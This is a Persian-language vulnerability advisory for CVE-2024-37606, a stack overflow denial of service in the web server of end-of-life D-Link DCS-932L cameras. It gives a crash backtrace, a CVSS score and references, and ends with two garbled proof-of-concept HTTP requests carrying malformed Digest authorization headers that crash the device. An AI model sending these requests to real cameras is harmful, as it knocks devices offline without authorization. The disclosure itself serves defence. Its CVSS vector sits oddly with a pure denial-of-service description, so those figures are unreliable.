خانه » CVE-2024-37606

CVE-2024-37606

آسیب پذیری سرریز stack در دوربین های D-Link DCS-932L

توسط Vulnerbyte_Alerts

چکیده

این آسیب پذیری مربوط  به  D-Link DCS-932L  نسخه 2.18.01 می باشد که میتواند از راه دور راه اندازی گردد . به نظر می رسد که این باگ بر روی عملکرد کامپوننت  HTTP Handler  تاثیر میگذارد.  ایجاد تغییرات در این المان می تواند منجر به سرریز stack شود.

 

توضیحات

این آسیب پذیری در D-Link DCS-932L  نسخه 2.18.01 وجود دارد که می تواند باعث شود یک سرور وب در یک دستگاه ریموت بدون احراز هویت ، از کار بیفتد که منجر به حمله انکار سرویس خواهد شد.

آسیب پذیری مربوط به /bin/alphapd است . زمانی که  /bin/alphapd یک درخواست HTTP دریافت کند، به دلیل سرریز شدن stack از کار افتاده و از برنامه خارج می شود.  این آسیب پذیری بر دسترس پذیری دستگاه تاثیر خواهد گذاشت.

روند اتفاقاتی که در stack رخ می دهد، در زیر نشان داده شده است:


#0  0x0040d4f4 in websReadEvent ()
#1  0x0040e4a4 in websSocketEvent ()
#2  0x???????? in websSocketEventProcess ()
#3  0x???????? in httpd_main ()
#4  0x???????? in main ()


به نظر می رسد که این آسیب پذیری ناشی از پردازش فیلد AUTHORIZATION  در هدر http می باشد . از آنجایی که برنامه درخواست HTTP  دستکاری شده را اعتبارسنجی نکرده است، یک پوینتر null  توسط برنامه اجرا می شود و با رسیدن به 0x0040d4f4 از کار می افتد.

 

سیستم امتیاز دهی آسیب پذیری ها بر اساس استاندارد های تحقیقاتی حوزه نمره دهی به آسیب پذیری ها، امتیازات زیر را برای شدت اثرگذاری این آسیب پذیری در نظر گرفته است.

Score Severity Version Vector String
6.6 MEDIUM 3.0 CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

 

 

محصولات آسیب پذیر

در زمان انتشار این اعلامیه، محصول زیر در معرض این آسیب پذیری قرار دارند:

 

  • DCL-932L 2.18.01

نرم افزار اصلاح شده

کلیه نسخه های سخت افزاری DCS-932L  به پایان چرخه تولید و سرویس دهی خود رسیده اند. آسیب پذیری های متعددی در مورد این محصولات گزارش شده است.

منابع مربوط به این محصولات به پایان توسعه خود رسیده اند و دیگر پشتیبانی دریافت نمی کنند. شزکت D-Link  توصیه کرده این محصولات را با محصولاتی که بروزرسانی های نرم افزاری دریافت می کنند جایگزین کنید.

 

نتیجه گیری

آسیب پذیری فوق در دسته آسیب پذیری های متوسط (Medium) دسته بندی می شود.  توصیه شده است که به منظور رفع این تهدید، دستگاه آسیب پذیر را با دستگاه های بروزتر جایگزین کنید.

 

منابع

  1. https://docs.google.com/document/d/1qWJh2jgEhmyeW3OefMQNsrlKdATMSU6Twjkk1p3qfAs/edit?pli=1&tab=t.0#heading=h.q9ubhbkd3uml
  2. https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10247
  3. https://vulmon.com/vulnerabilitydetails?qid=CVE-2024-37606
  4. https://vuldb.com/?id.288747
  5. https://www.cve.org/CVERecord?id=CVE-2024-37606

PoC1:

POST /setTestEmail H1.1

Host: 192.168.0.1

S11b?Proxy-Connection: keep-alive

Content-Length: 44

Cache-CpntrgetAsnRsaPubKeyuthorization: Digest username=”admip”, realm=”_00″, nonce=-bePOST /setTestEmail1.1

Host: 192.168.0.1

Proxy-Con\ection: eep-alive

Cotent-Length: 44

Cache-Control: max-age=0

Authorization: Digest username=”admin”, realm=”_00″, nonce=”bec7240d6b023f81b21a9db8251aTestEmail”, response=”9416cd78c1a5cd762638138d30c8568e”, 88, cnonce”b1ca500a3c1cf965″

Upgrade-Insecure-Requests: 1

Origin: http://1168.0.1

Content-TypPOST /setTesil HTTP/1.1

Host: 192.1e=”.0.1

Proxy-CWnne”, aliveEmailPasswo\-age=0

Authorizatin: Digest ue=0

Authorization: Digest username=”admin”, realm=

_00″……………16cd78c1a5cd76263813ec7240d6b023f81b21a9db8251a8b8Z”,ri=”/setTvstEmail”, response=”9..nam68.0.1

Proxy-CWnnection: keep-ce=”b8d30c8568e”, qop=aut000088, cnonce=”b1ca500a3c1c#

 

PoC2:

POST /setTestEma/cgi-bin/.1

Host: 192.168.0.1

Proxy-Connection: keep-a88, cnonce=”b1ca5065″

Upgache-Control: max-age=0

Authorization: Digest us00″, nonce=”bec7240d6b023f81b21I9db8251a8b88″, uri=”/setTestEmail”, respons416cd78c1a5cd762638138d30c8568e”, qop=auth, {c=00000088, cnonce=”b1ca500a3c1cf95″

Upgrade-Insecure-Requests: 1

Origin:;q=0.9,image/avif,image/webp,imx-www-form-trlencode: Mozilla/5.0 (compatibe; MSIE 11.0; Windows NT 10.; Trident/7.0; .NET4.0E; .NET4.0C)

Accept: text/html,application/xhtml+xml,apqlication/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,applicatsigned-excPOST /setTestEmail HTTP/1.1

Host: 192.168.0.1

Proxy-Connection: keep-alivv

Content-Length: 44

Cache-Control: max-age=0

Authorization: Digest usrname=”admin”, realm=”_00″, nonce=”bec7240d6b023f81b21a9db8251a8b88″, uri=”/setTestEmail”, response=”9416cd78c1a5cd762638138d30c8568e”, qop=auth, nc=00000088, cnonce=#

همچنین ممکن است دوست داشته باشید

پیام بگذارید